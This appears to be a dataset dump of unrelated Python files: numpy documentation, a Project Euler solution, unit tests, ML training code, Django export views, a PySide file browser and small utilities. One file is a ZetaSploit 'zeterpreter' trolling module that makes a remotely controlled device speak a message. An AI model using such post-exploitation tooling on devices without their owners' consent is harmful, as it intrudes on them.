>>> class DiagonalArray(numpy.lib.mixins.NDArrayOperatorsMixin):
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
... def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
... if method == '__call__':
... N = None
... scalars = []
... for input in inputs:
... if isinstance(input, Number):
... scalars.append(input)
... elif isinstance(input, self.__class__):
... scalars.append(input._i)
... if N is not None:
... if N != self._N:
... raise TypeError("inconsistent sizes")
... else:
... N = self._N
... else:
... return NotImplemented
... return self.__class__(N, ufunc(*scalars, **kwargs))
... else:
... return NotImplemented
...
>>> arr = DiagonalArray(5, 1)
>>> arr + 3
DiagonalArray(N=5, value=4)
>>> arr > 0
DiagonalArray(N=5, value=True)
Now let's tackle ``__array_function__``. We'll create a dict that maps numpy
functions to our custom variants.
>>> HANDLED_FUNCTIONS = {}
>>> class DiagonalArray(numpy.lib.mixins.NDArrayOperatorsMixin):
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
... def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
... if method == '__call__':
... N = None
... scalars = []
... for input in inputs:
... # In this case we accept only scalar numbers or DiagonalArrays.
... if isinstance(input, Number):
... scalars.append(input)
... elif isinstance(input, self.__class__):
... scalars.append(input._i)
... if N is not None:
... if N != self._N:
... raise TypeError("inconsistent sizes")
... else:
... N = self._N
... else:
... return NotImplemented
... return self.__class__(N, ufunc(*scalars, **kwargs))
... else:
... return NotImplemented
... def __array_function__(self, func, types, args, kwargs):
... if func not in HANDLED_FUNCTIONS:
... return NotImplemented
... # Note: this allows subclasses that don't override
... # __array_function__ to handle DiagonalArray objects.
... if not all(issubclass(t, self.__class__) for t in types):
... return NotImplemented
... return HANDLED_FUNCTIONS[func](*args, **kwargs)
...
A convenient pattern is to define a decorator ``implements`` that can be used
to add functions to ``HANDLED_FUNCTIONS``.
>>> def implements(np_function):
... "Register an __array_function__ implementation for DiagonalArray objects."
... def decorator(func):
... HANDLED_FUNCTIONS[np_function] = func
... return func
... return decorator
...
Now we write implementations of numpy functions for ``DiagonalArray``.
For completeness, to support the usage ``arr.sum()`` add a method ``sum`` that
calls ``numpy.sum(self)``, and the same for ``mean``.
>>> @implements(np.sum)
... def sum(arr):
... "Implementation of np.sum for DiagonalArray objects"
... return arr._i * arr._N
...
>>> @implements(np.mean)
... def mean(arr):
... "Implementation of np.mean for DiagonalArray objects"
... return arr._i / arr._N
...
>>> arr = DiagonalArray(5, 1)
>>> np.sum(arr)
5
>>> np.mean(arr)
0.2
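The ``sum`` and ``mean`` methods mentioned above can simply forward to these
registered functions. A minimal sketch (the helpers are attached to the class
after the fact here only to keep the example short):
>>> def _sum(self):
...     "Forward to np.sum, which dispatches back to the registered implementation."
...     return np.sum(self)
...
>>> def _mean(self):
...     "Forward to np.mean."
...     return np.mean(self)
...
>>> DiagonalArray.sum = _sum
>>> DiagonalArray.mean = _mean
>>> arr.sum()
5
>>> arr.mean()
0.2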
If the user tries to use any numpy functions not included in
``HANDLED_FUNCTIONS``, a ``TypeError`` will be raised by numpy, indicating that
this operation is not supported. For example, concatenating two
``DiagonalArrays`` does not produce another diagonal array, so it is not
supported.
>>> np.concatenate([arr, arr])
TypeError: no implementation found for 'numpy.concatenate' on types that implement __array_function__: [<class '__main__.DiagonalArray'>]
Additionally, our implementations of ``sum`` and ``mean`` do not accept the
optional arguments that numpy's implementation does.
>>> np.sum(arr, axis=0)
TypeError: sum() got an unexpected keyword argument 'axis'
The user always has the option of converting to a normal ``numpy.ndarray`` with
:func:`numpy.asarray` and using standard numpy from there.
>>> np.concatenate([np.asarray(arr), np.asarray(arr)])
array([[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.],
[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]])
Refer to the `dask source code <https://github.com/dask/dask>`_ and
`cupy source code <https://github.com/cupy/cupy>`_ for more fully-worked
examples of custom array containers.
See also `NEP 18 <http://www.numpy.org/neps/nep-0018-array-function-protocol.html>`_.
"""
| 3.09375 | 3 |
5/005_smallest_divisible_by_1_through_20.py | the-gigi/project-euler | 7 | 12786810 | <filename>5/005_smallest_divisible_by_1_through_20.py
"""Smallest Multiple - https://projecteuler.net/problem=5
2520 is the smallest number that can be divided by each of the numbers from
1 to 10 without any remainder.
What is the smallest positive number that is evenly divisible by all of the
numbers from 1 to 20?
"""
def get_prime_product(n):
"""Return a dictionary with prime keys and exponent values
The product of all the keys raised to their exponent is the number
For example: 20 = 2 ** 2 * 5 -> {2: 2, 5:1}
"""
primes_to_20 = (2, 3, 5, 7, 11, 13, 17, 19)
if n in primes_to_20:
return {n: 1}
result = {k: 0 for k in primes_to_20}
for p in primes_to_20:
while n % p == 0:
result[p] += 1
n /= p
result = {k: v for k, v in result.iteritems() if v > 0}
return result
numbers = range(20, 2, -1)
result = {}
for n in numbers:
prime_product = get_prime_product(n)
for k, v in prime_product.iteritems():
if k not in result:
result[k] = v
elif v > result[k]:
result[k] = v
final_number = 1
for k, v in result.iteritems():
final_number *= k ** v
assert 232792560 == final_number
| 3.921875 | 4 |
tests/segment.py | soootaleb/spare | 1 | 12786811 | import unittest, random
from models.point import Point
from models.segment import Segment
import numpy as np
class TestSegmentMethods(unittest.TestCase):
def test_new(self):
with self.assertRaises(ValueError) as context:
Segment([])
def test_extremums(self):
a = Point(random.randint(0, 100), random.randint(0, 100))
b = Point(random.randint(0, 100), random.randint(0, 100))
c = Point(random.randint(0, 100), random.randint(0, 100))
segment = Segment([a, b, c])
self.assertEqual(segment.start, a)
self.assertEqual(segment.end, c)
def test_getitem(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
self.assertEqual(segment[Point(10, 20)], a) # Access by point
self.assertEqual(segment[20, 30], b) # Access by coordinates
self.assertEqual(segment[2], c) # Access by index
self.assertEqual(segment[100, 100], None) # Accessing a missing point
def test_append(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
segment.append(Point(31, 40))
# Working case
self.assertEqual(segment.end, Point(31, 40))
# Point is too far
with self.assertRaises(ValueError) as context:
segment.append(Point(100, 100))
# Point already exists
with self.assertRaises(ValueError) as context:
segment.append(Point(31, 40))
def test_angle(self):
angle_1 = Segment([Point(0, 0), Point(10, 10)]) # Angle is 45°
angle_2 = Segment([Point(0, 0), Point(10, 20)]) # Angle is arctan(20/10)
angle_half = Segment([Point(0, 0), Point(20, 10)]) # Angle is arctan(10/20)
angle_vertical = Segment([Point(0, 0), Point(10, 0)]) # Angle is 0°
angle_horizontal = Segment([Point(0, 0), Point(0, 10)]) # Angle is 90°
self.assertAlmostEqual(angle_1.angle(radians = True), np.pi / 4)
self.assertAlmostEqual(angle_half.angle(radians = True), np.arctan(2))
self.assertAlmostEqual(angle_horizontal.angle(radians = True), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = True), np.pi / 2)
self.assertAlmostEqual(angle_1.angle(radians = False), 45)
self.assertAlmostEqual(angle_half.angle(radians = False), 63, places = 0)
self.assertAlmostEqual(angle_horizontal.angle(radians = False), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = False), 90) | 3.171875 | 3 |
EfficientNet-Transfer-Learning-Boiler-Plate/model_retrain_remove_layer.py | ntedgi/deep-learning-data-preparation-tools | 0 | 12786812 | import efficientnet.keras as efn
import os
from keras.layers import *
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
# load checkpoint
def get_efficentnet_check_point(argument):
check_points = {
0: efn.EfficientNetB0(weights='imagenet'),
1: efn.EfficientNetB1(weights='imagenet'),
2: efn.EfficientNetB2(weights='imagenet'),
3: efn.EfficientNetB3(weights='imagenet'),
4: efn.EfficientNetB4(weights='imagenet'),
5: efn.EfficientNetB5(weights='imagenet'),
6: efn.EfficientNetB6(weights='imagenet'),
7: efn.EfficientNetB7(weights='imagenet')
}
return check_points.get(argument, "Invalid month")
experiment_name = "test5_7"
data_dir = "test2"
working_dir = "/home/naor/projects/Image-Recognition"
model_name = f'{experiment_name}.h5'
train_data_input_folder = f'{working_dir}/{data_dir}/train/'
validation_data_input_folder = f'{working_dir}/test1/val/'
model_output_dir = f'{working_dir}/models'
model_output_path = f'{model_output_dir}/{model_name}'
if not os.path.exists(model_output_dir):
os.mkdir(model_output_dir)
# input dimension for current check point
input_dim = 600
model = efn.EfficientNetB7()
# remove last layer
model.layers.pop()
model.summary()
layer = Dense(5, activation='sigmoid', name='new_layer')(model.get_layer('avg_pool').output)
new_model = Model(model.input, layer)
# create new output layer
output_layer = Dense(5, activation='sigmoid', name='output')(new_model.get_layer('new_layer').output)
#
new_model = Model(model.input, output_layer)
# lock previous weights
for i, l in enumerate(new_model.layers):
if i < 228:
l.trainable = False
# new_model.compile(loss='sparse_categorical_crossentropy', optimizer='adam')
new_model.compile(loss='mean_squared_error', optimizer='adam')
# generate train data
train_datagen = ImageDataGenerator(
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
validation_split=0)
train_generator = train_datagen.flow_from_directory(
train_data_input_folder,
target_size=(input_dim, input_dim),
batch_size=8,
class_mode='categorical',
seed=2019,
subset='training')
validation_generator = train_datagen.flow_from_directory(
validation_data_input_folder,
target_size=(input_dim, input_dim),
batch_size=4,
class_mode='categorical',
seed=2019,
subset='validation')
new_model.fit_generator(
train_generator,
samples_per_epoch=2000 // 32,
epochs=40,
validation_steps=20,
validation_data=validation_generator,
nb_worker=24)
new_model.save(model_output_path)
| 2.53125 | 3 |
tests/test_exception.py | AustinScola/illud | 1 | 12786813 | <filename>tests/test_exception.py<gh_stars>1-10
"""Test illud.exception."""
from illud.exception import IlludException
def test_inheritance() -> None:
"""Test illud.exception.IlludException inheritance."""
assert issubclass(IlludException, Exception)
| 1.914063 | 2 |
slugifile/slugifile.py | codehutlabs/slugifile | 0 | 12786814 | # -*- coding: utf-8 -*-
from slugify import slugify
import os
"""Main module."""
def ascii_safe_filename(filename: str) -> dict:
file = os.path.splitext(filename)
slug = slugify(file[0], separator="_")
ext = file[1]
return {"f_in": filename, "f_out": "{}{}".format(slug, ext)}
def slugifile_directory(path: str):
success = True
messages = []
if path is None:
success = False
messages.append("No path specified. Done.")
else:
path = path.rstrip("\\/")
if not os.path.isdir(path):
success = False
messages.append("Path specified is not a directory. Done.")
else:
filenames = os.listdir(path)
for filename in filenames:
result = ascii_safe_filename(filename)
f_in = result["f_in"]
f_out = result["f_out"]
if f_in == f_out:
messages.append("Skipping: {}".format(f_in))
continue
filename_in = "{}/{}".format(path, f_in)
filename_out = "{}/{}".format(path, f_out)
messages.append("Renaming: {} => {}".format(f_in, f_out))
os.rename(filename_in, filename_out)
return {"success": success, "messages": messages}
| 3.015625 | 3 |
dps/admin.py | takeflight/django-dps | 0 | 12786815 | <reponame>takeflight/django-dps<filename>dps/admin.py
from django.contrib.admin import SimpleListFilter
from django.contrib import admin
from django.contrib.contenttypes.admin import GenericTabularInline
from .models import Transaction
class ContentTypeFilter(SimpleListFilter):
title = 'purchase type'
parameter_name = 'type'
def lookups(self, request, model_admin):
ctypes = Transaction.objects.values_list(
'content_type__id', 'content_type__app_label',
'content_type__model') \
.order_by('content_type__id').distinct()
return [(c[0], (u"%s: %s" % c[1:]).title()) for c in ctypes]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(content_type__id__exact=self.value())
else:
return queryset
class TransactionAdmin(admin.ModelAdmin):
list_display = ('amount', 'status', 'transaction_type',
'content_object', 'created',)
search_fields = ('secret', )
list_filter = (ContentTypeFilter, )
class TransactionInlineAdmin(GenericTabularInline):
model = Transaction
def has_add_permission(self, request):
return False
admin.site.register(Transaction, TransactionAdmin)
| 2.09375 | 2 |
ldb/export.py | bramvankooten/dienst2 | 1 | 12786816 | <gh_stars>1-10
import csv
import operator
import re
from functools import reduce
from io import StringIO
from django.db.models import Q
from django.utils.encoding import smart_str
from rest_framework import renderers, status
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from six import iteritems
from ldb.models import *
class CSVRenderer(renderers.BaseRenderer):
media_type = "text/csv"
format = "csv"
def render(self, data, media_type=None, renderer_context=None):
if not isinstance(data, list):
return data
if len(data) < 1:
return "Geen resultaten"
order = [
"name",
"streetnumber",
"postcodecity",
"kixcode",
"street_name",
"house_number",
"address_2",
"address_3",
"postcode",
"city",
"country",
"email",
"phone_fixed",
"organization__name_prefix",
"organization__name",
"organization__name_short",
"organization__salutation",
"person__titles",
"person__initials",
"person__firstname",
"person__preposition",
"person__surname",
"person__postfix_titles",
"person__phone_mobile",
"person__gender",
"person__birthdate",
"person__email_forward",
"person__ldap_username",
"person__netid",
"person__student__study",
"person__student__first_year",
"person__student__student_number",
"person__student__enrolled",
"person__student__emergency_name",
"person__student__emergency_phone",
"person__alumnus__study",
"person__alumnus__study_first_year",
"person__alumnus__study_last_year",
"person__alumnus__work_company",
"id",
]
fields = list(data[0]._data.keys())
fields.sort(key=lambda p: order.index(p))
raw_data = StringIO()
writer = csv.DictWriter(raw_data, fieldnames=fields, quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for obj in data:
writer.writerow({k: smart_str(v) for k, v in obj._data.items()})
return raw_data.getvalue()
class ExportObject(object):
def __init__(self, initial=None):
self.__dict__["_data"] = {}
if hasattr(initial, "items"):
self.__dict__["_data"] = initial
def __getattr__(self, name):
return self._data.get(name, None)
def __setattr__(self, name, value):
self.__dict__["_data"][name] = value
def to_dict(self):
return self._data
def flatten(infile):
output = []
for obj in infile:
fields = infile.get(obj)
if obj == "entity":
output += fields
else:
for field in fields:
output.append("%s__%s" % (obj, field))
return output
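# Example (illustrative): flatten({"entity": ["city"], "person": ["firstname"]})
# returns ["city", "person__firstname"], i.e. Django ORM lookup paths relative
# to Entity; output order follows the dict's insertion order.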
class Export(APIView):
renderer_classes = (TemplateHTMLRenderer, CSVRenderer)
def get(self, request):
data = {"title": "Ledendatabase", "ng_app": "ldb"}
return Response(data, template_name="ldb/export.html")
# Fields
allowed_fields = {
"entity": [
"street_name",
"house_number",
"address_2",
"address_3",
"postcode",
"city",
"country",
"email",
"phone_fixed",
],
"organization": ["name_prefix", "name", "name_short", "salutation"],
"person": [
"titles",
"initials",
"firstname",
"preposition",
"surname",
"postfix_titles",
"phone_mobile",
"gender",
"birthdate",
"email_forward",
"ldap_username",
"netid",
],
"person__member": [],
"person__student": [
"study",
"first_year",
"student_number",
"enrolled",
"emergency_name",
"emergency_phone",
],
"person__alumnus": [
"study",
"study_first_year",
"study_last_year",
"work_company",
],
"person__employee": [],
}
def set_fields(self, query):
allowed_fields = flatten(self.allowed_fields)
requested_fields = query.get("fields", [])
fields = {}
for k, v in iteritems(requested_fields):
if v:
fields[k] = v
requested_fields = fields
export_fields = list(set(allowed_fields) & set(requested_fields))
if len(export_fields) == 0:
export_fields = ["id"]
return export_fields
# Querysets
living_person = Q(~Q(person__isnull=True), Q(person__deceased=False))
allowed_querysets = {
"organizations": Q(~Q(organization__isnull=True)),
"members": Q(
living_person,
Q(person__member__date_from__isnull=False),
Q(person__member__date_to__isnull=True)
| Q(person__member__date_to__gt=date.today()),
),
"merit": Q(living_person, ~Q(person__member__merit_date_from__isnull=True)),
"honorary": Q(
living_person, ~Q(person__member__honorary_date_from__isnull=True)
),
"students": Q(living_person, ~Q(person__student__isnull=True)),
"alumni": Q(living_person, ~Q(person__alumnus__isnull=True)),
"employees": Q(living_person, ~Q(person__employee__isnull=True)),
}
def set_querysets(self, query):
requested_querysets = query.get("queryset", [])
querysets = {}
for k, v in iteritems(requested_querysets):
if v == True:
querysets[k] = v
requested_querysets = querysets
export_querysets = list(set(self.allowed_querysets) & set(requested_querysets))
return export_querysets
# Filters
allowed_filters = {
"entity": [
"country",
"machazine",
"board_invites",
"constitution_card",
"christmas_card",
"yearbook",
],
"organization": [],
"person": ["mail_announcements", "mail_company", "mail_education"],
"person__member": ["associate_member", "donating_member", "merit_invitations"],
"person__student": ["first_year", "enrolled", "yearbook_permission"],
"person__alumnus": [],
"person__employee": [],
}
def set_filters(self, query):
export_filters = {}
allowed_filters = flatten(self.allowed_filters)
requested_filters = query.get("filters", [])
for field in requested_filters:
if field in allowed_filters:
value = requested_filters.get(field)
if value == "true":
export_filters[field] = True
elif value == "false":
export_filters[field] = False
elif value != "undefined":
export_filters[field] = value
return export_filters
def post(self, request):
querysets = self.set_querysets(request.data)
if not querysets:
return Response("No groups selected", status=status.HTTP_400_BAD_REQUEST)
objects = Entity.objects.filter(
reduce(
operator.or_, map(lambda x: self.allowed_querysets.get(x), querysets)
)
)
filters = self.set_filters(request.data)
objects = objects.filter(**filters)
addresslist = request.data.get("addresslist", "off")
if addresslist == "off":
export_fields = self.set_fields(request.data)
objects = objects.values(*export_fields)
converted = list(map(ExportObject, objects))
elif addresslist in ["doubles", "living_with"]:
objects = objects.filter(~Q(street_name=""), ~Q(house_number="")).values(
"street_name",
"house_number",
"address_2",
"address_3",
"postcode",
"city",
"organization__name_prefix",
"organization__name",
"organization__name_short",
"organization__salutation",
"person__titles",
"person__initials",
"person__firstname",
"person__preposition",
"person__surname",
"person__postfix_titles",
"person__living_with",
"person__gender",
"id",
)
def getname(obj):
if obj.get("organization__name"):
name = obj.get("organization__name_prefix", "")
name += " "
name += obj.get("organization__name")
name = re.sub("\s+", " ", name)
return name.strip()
elif obj.get("person__surname"):
titles = obj.get("person__titles")
if titles:
firstname = "%s %s" % (
titles,
obj.get(
"person__initials", obj.get("person__firstname", "")
),
)
else:
firstname = obj.get(
"person__firstname", obj.get("person__initials", "")
)
name = "%s %s %s %s" % (
firstname,
obj.get("person__preposition", ""),
obj.get("person__surname", ""),
obj.get("person__postfix_titles", ""),
)
name = re.sub("\s+", " ", name)
return name.strip()
else:
return ""
if addresslist == "living_with":
doubles = {}
others = []
for obj in objects:
if obj.get("person__living_with"):
if doubles.get(obj["person__living_with"]):
other = doubles[obj["person__living_with"]]
if obj.get("person__gender") == "M":
obj["combined_name"] = "%s en %s" % (
getname(obj),
getname(other),
)
else:
obj["combined_name"] = "%s en %s" % (
getname(other),
getname(obj),
)
others.append(obj)
else:
doubles[obj["id"]] = obj
else:
others.append(obj)
objects = others
def format(obj):
converted_obj = {}
converted_obj["streetnumber"] = "%s %s" % (
obj.get("street_name"),
obj.get("house_number"),
)
postcode = obj.get("postcode").replace(" ", "")
converted_obj["postcodecity"] = "%s %s" % (postcode, obj.get("city"))
converted_obj["kixcode"] = "%s%s" % (postcode, obj.get("house_number"))
converted_obj["name"] = obj.get("combined_name", getname(obj))
return ExportObject(converted_obj)
converted = list(map(format, objects))
converted.sort(key=lambda p: p.kixcode)
return Response(converted)
| 2.0625 | 2 |
filemon/files.py | asvetlov/filemon | 0 | 12786817 | import os
import sys
import subprocess
from PySide import QtGui, QtCore
class FileSystemModel(QtGui.QFileSystemModel):
filter_reset = QtCore.Signal()
root_index_changed = QtCore.Signal(QtCore.QModelIndex)
status_changed = QtCore.Signal(int, int)
STORAGE_NAME = '.filemon.dat'
def __init__(self):
QtGui.QFileSystemModel.__init__(self)
self.setFilter(QtCore.QDir.AllDirs |
QtCore.QDir.NoDot |
QtCore.QDir.NoDotDot |
QtCore.QDir.AllEntries |
QtCore.QDir.DirsFirst |
QtCore.QDir.Name)
self._processed = set()
self._marked_count = 0
self._total_count = 0
self.setNameFilterDisables(False)
self.directoryLoaded.connect(self._update_stats)
def _update_stats(self):
files = self._files()
print(files, self._processed)
self._marked_count = sum(1 for f in files if f in self._processed)
self._total_count = len(files)
self.status_changed.emit(self._total_count, self._marked_count)
@QtCore.Slot(str)
def filter_changed(self, text):
print('filter changed', text)
text = text.strip()
if text:
self.setNameFilters(['*' + text + '*'])
else:
self.setNameFilters([])
self._update_stats()
def _files(self):
ret = []
idx = self.index(self.rootPath())
for i in range(0, self.rowCount(idx)):
child = idx.child(i, idx.column())
ret.append(self.fileName(child))
return ret
def set_path(self, path):
print(path)
path = os.path.abspath(path)
self.reset()
self.setRootPath(path)
self.filter_reset.emit()
self.root_index_changed.emit(self.index(path))
storage = os.path.join(path, self.STORAGE_NAME)
self._processed = set()
present = set(os.listdir(path))
if os.path.isfile(storage):
with open(storage) as f:
data = set(f.read().splitlines())
self._processed = data - present
if data != self._processed:
self._save()
self._update_stats()
@QtCore.Slot()
def go_parent(self):
path = self.rootPath()
self.set_path(path + '/..')
@QtCore.Slot()
def go_home(self):
path = os.path.expanduser('~')
self.set_path(path)
@QtCore.Slot()
def go_cwd(self):
self.set_path(os.getcwd())
def file_dragged(self, path):
print("Dragged", path)
self._processed.add(path)
self._save()
def _save(self):
self._update_stats()
storage = os.path.join(self.rootPath(), self.STORAGE_NAME)
with open(storage, 'w') as f:
f.write('\n'.join(sorted(self._processed)))
def data(self, index, role):
if index.isValid() and role == QtCore.Qt.ForegroundRole:
path = self.filePath(index)
if path in self._processed:
return QtGui.QBrush(QtGui.QColor(255, 0, 0))
return super().data(index, role)
@QtCore.Slot()
def reset_markers(self):
self._processed = set()
self._save()
self.set_path(self.rootPath())
def unmark(self, index):
if not index.isValid():
return
path = self.filePath(index)
self._processed.discard(path)
self._save()
self.set_path(self.rootPath())
def start_file(self, index):
filename = self.fileName(index)
if sys.platform == "win32":
os.startfile(filename)
else:
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
class FileView(QtGui.QListView):
def __init__(self, parent):
QtGui.QListView.__init__(self, parent)
self.setDragEnabled(True)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self._drag_start_pos = event.pos()
return QtGui.QListView.mousePressEvent(self, event)
def mouseMoveEvent(self, event):
if not event.buttons() & QtCore.Qt.LeftButton:
return
if ((event.pos() - self._drag_start_pos).manhattanLength() <
QtGui.QApplication.startDragDistance()):
return
model = self.model()
drag = QtGui.QDrag(self)
index = self.indexAt(self._drag_start_pos)
if not index.isValid():
return
if model.isDir(index):
return
path = model.filePath(index)
mimedata = model.mimeData([index])
drag.setMimeData(mimedata)
drop_action = drag.exec_(QtCore.Qt.CopyAction)
if drop_action == QtCore.Qt.CopyAction:
model.file_dragged(path)
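# Minimal wiring sketch (illustrative only; assumes a running Qt event loop):
#   app = QtGui.QApplication([])
#   model = FileSystemModel()
#   view = FileView(None)
#   view.setModel(model)
#   model.root_index_changed.connect(view.setRootIndex)
#   model.set_path('.')
#   view.show()
#   app.exec_()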
| 2.375 | 2 |
08-recursive-and-backtracking/leetcode_22.py | xiaolinzi-xl/Algorithm-Interview-Study | 1 | 12786818 | ans = []
def rebot(l, r, n, res):
    # Backtracking helper: l and r count the '(' and ')' already placed,
    # res is the partial string built so far, n is the number of pairs.
    if l == n and r == n:
        ans.append(res)
        return
    if l > r:
        # More '(' than ')': either bracket keeps the prefix valid.
        if l < n:
            rebot(l + 1, r, n, res + '(')
        rebot(l, r + 1, n, res + ')')
    elif l == r:
        # Balanced so far: only '(' can come next.
        rebot(l + 1, r, n, res + '(')
class Solution:
def generateParenthesis(self, n):
ans.clear()
rebot(1, 0, n, '(')
return ans
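# Example (illustrative): Solution().generateParenthesis(3) returns
# ['((()))', '(()())', '(())()', '()(())', '()()()']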
| 3.359375 | 3 |
manifold_flow/flows/flow.py | selflein/manifold-flow | 199 | 12786819 | <reponame>selflein/manifold-flow
import logging
from manifold_flow.utils.various import product
from manifold_flow import distributions
from manifold_flow.flows import BaseFlow
logger = logging.getLogger(__name__)
class Flow(BaseFlow):
""" Ambient normalizing flow (AF) """
def __init__(self, data_dim, transform):
super(Flow, self).__init__()
self.data_dim = data_dim
self.latent_dim = data_dim
self.total_data_dim = product(data_dim)
self.total_latent_dim = product(self.latent_dim)
self.latent_distribution = distributions.StandardNormal((self.total_latent_dim,))
self.transform = transform
self._report_model_parameters()
def forward(self, x, context=None):
""" Transforms data point to latent space, evaluates log likelihood """
# Encode
u, log_det = self._encode(x, context=context)
# Decode
x = self.decode(u, context=context)
# Log prob
log_prob = self.latent_distribution._log_prob(u, context=None)
log_prob = log_prob + log_det
return x, log_prob, u
def encode(self, x, context=None):
""" Encodes data point to latent space """
u, _ = self._encode(x, context=context)
return u
def decode(self, u, context=None):
""" Encodes data point to latent space """
x, _ = self.transform.inverse(u, context=context)
return x
def log_prob(self, x, context=None):
""" Evaluates log likelihood """
# Encode
u, log_det = self._encode(x, context)
# Log prob
log_prob = self.latent_distribution._log_prob(u, context=None)
log_prob = log_prob + log_det
return log_prob
def sample(self, u=None, n=1, context=None):
""" Generates samples from model """
if u is None:
u = self.latent_distribution.sample(n, context=None)
x = self.decode(u, context=context)
return x
def _encode(self, x, context=None):
u, log_det = self.transform(x, context=context)
return u, log_det
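# Minimal usage sketch (illustrative; `some_transform` stands for any invertible
# transform constructed elsewhere in manifold_flow):
#   flow = Flow(data_dim=8, transform=some_transform)
#   x_rec, log_prob, u = flow(x_batch)   # encode, decode and score a batch
#   samples = flow.sample(n=16)          # draw 16 samples from the model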
| 2.46875 | 2 |
InvoiceSystem-python/paymentCharged.py | gvensan/ep-design-workshop | 0 | 12786820 | <reponame>gvensan/ep-design-workshop
from enum import Enum
from typing import Sequence
from entity import Entity
class PaymentCharged(Entity):
class Driver(Entity):
def __init__(
self,
driverId: int,
rating: int,
lastName: str,
carClass: str,
firstName: str):
self.driverId = driverId
self.rating = rating
self.lastName = lastName
self.carClass = carClass
self.firstName = firstName
class Passenger(Entity):
def __init__(
self,
passengerId: int,
rating: int,
lastName: str,
firstName: str):
self.passengerId = passengerId
self.rating = rating
self.lastName = lastName
self.firstName = firstName
def __init__(
self,
entityType: str,
rideId: str,
amountCharged: float,
driver: Driver,
paymentChargedId: str,
passenger: Passenger,
paymentStatus: str,
invoiceSystemId: str,
informationSource: str,
timestamp: str):
self.entityType = entityType
self.rideId = rideId
self.amountCharged = amountCharged
self.driver = driver
self.paymentChargedId = paymentChargedId
self.passenger = passenger
self.paymentStatus = paymentStatus
self.invoiceSystemId = invoiceSystemId
self.informationSource = informationSource
self.timestamp = timestamp
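# Example construction (illustrative values only):
#   event = PaymentCharged(
#       entityType="PaymentCharged", rideId="ride-123", amountCharged=12.5,
#       driver=PaymentCharged.Driver(1, 5, "Doe", "sedan", "Jane"),
#       paymentChargedId="pay-1",
#       passenger=PaymentCharged.Passenger(2, 4, "Roe", "John"),
#       paymentStatus="accepted", invoiceSystemId="inv-9",
#       informationSource="MobileApp", timestamp="2021-01-01T00:00:00Z")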
| 2.984375 | 3 |
plugins/zeterpreter/multi/trolling/say.py | CrackerCat/ZetaSploit | 3 | 12786821 | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.badges import badges
class ZetaSploitPlugin:
def __init__(self, controller):
self.controller = controller
self.badges = badges()
self.details = {
'Name': "multi/trolling/say",
'Authors': ['enty8080'],
'Description': "Say text message on device.",
'Comment': "idk?"
}
self.options = {
'MESSAGE': {
'Description': "Message to say.",
'Value': "Hello, zeterpreter!",
'Required': True
}
}
def run(self):
status, output = self.controller.send_command("say", self.options['MESSAGE']['Value'])
if status == "error":
print(self.badges.E + "Failed to say message!") | 1.90625 | 2 |
storage/baidu_cloud.py | wangkaibiao/SettlersFinancialData3 | 0 | 12786822 | <reponame>wangkaibiao/SettlersFinancialData3
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
bypy needs authorization the first time it runs: just run any command (e.g. bypy info)
and follow the instructions (login, etc.) to authorize.
Authorization is only needed once; after it succeeds, the prompt will not appear again.
For more details on a command: bypy help <command>
List the files under the (app's) root directory on the cloud drive: bypy list
Sync the current directory up to the cloud drive: bypy syncup or bypy upload
Sync the cloud drive contents down to the local machine: bypy syncdown or bypy downdir /
Compare the local current directory with the (app's) cloud root (personally very useful): bypy compare
For more commands and detailed explanations, see the output of running bypy.
Debugging
Add the -v flag at runtime to show progress details.
Add -d at runtime to show some debug information.
Add -ddd to also show HTTP traffic (warning: very verbose).
For shared tips and discussion, please see the wiki.
"""
from bypy import ByPy#,gui
import os,sys,psutil
from service import png
"""-------------------------------------------------------------------------"""
_paths=["/media/sfd/1CEE36D0EE36A1C6/core/","/media/sfd/LENOVO/SFD_assistant/core/"]
for _path in _paths:
if os.path.exists(_path):
base_path=_path
externalPaths=[base_path + 'basic_linux' ,
base_path + 'intelligent_device' ,
base_path + 'knowledge_continue' ,
]
#os.listdir(externalPaths[0])
